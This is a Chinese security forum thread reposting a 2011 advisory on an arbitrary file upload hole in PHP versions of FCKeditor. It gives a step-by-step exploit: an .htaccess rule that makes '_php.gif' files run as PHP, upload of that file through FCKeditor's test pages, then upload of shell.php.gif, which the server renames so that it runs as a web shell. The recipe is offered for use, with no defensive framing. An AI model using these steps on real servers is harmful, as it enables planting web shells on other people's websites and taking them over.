找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2317|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞% l% h6 S/ t* X' h
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
5 ?9 m" N6 h, K' R/ m9 r) V- @减小字体 增大字体
& n: y% V$ R8 z4 B[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
4 J9 l5 u. r4 i/ i/ H: X[+] Date: 2011
; {* j% U' |  b) W1 D. z[+] Author : sinesafe.cn- F" f1 Y2 k/ H: l$ A
[+] Website : WwW.sinesafe.cn; [8 c9 E2 k/ T, o7 e
———————————————————
# ?( [& Q6 f! k- `* I# W1.create a htaccess file:
% R9 P7 L& O, o, r- o! ?; {code:
8 _3 a& {  g! M' d<FilesMatch “_php.gif”>7 G) q' r$ P1 E# `  F2 r
SetHandler application/x-httpd-php9 R2 z' d- J; F9 x
</FilesMatch>/ q" w0 @- Z" N; w; Y" q
: C! j! W9 X$ S
2.Now upload this htaccess with FCKeditor.; b; s1 {8 m3 d! e/ ^2 {) q' f, {# T
3 T6 C( l0 o: N% j# M5 G
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html! C& E( v# g- p5 Z5 Z5 }

+ v( I; |7 p) X$ M, O1 Lhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html; Q) v* ]0 F5 ^# K0 E

; P: R9 V/ D# j, a' Y* G———————————————————————————————-
4 s% Z: C9 V  {. W' M$ w+ _3.Now upload shell.php.gif with FCKeditor.5 W2 x" M, u, W
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 L- [3 [! Q. c/ X4 Y$ N3 t! `
5.http://www.sinesafe.cn/anything/shell_php.gif
& w% C) |, v5 e' k3 b  E' A6.Now shell is available from server.

( k6 n8 R$ A: O1 s1 o6 {) X  L' |# r  U

9 n" q5 E# i* z2 ?' W, C6 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表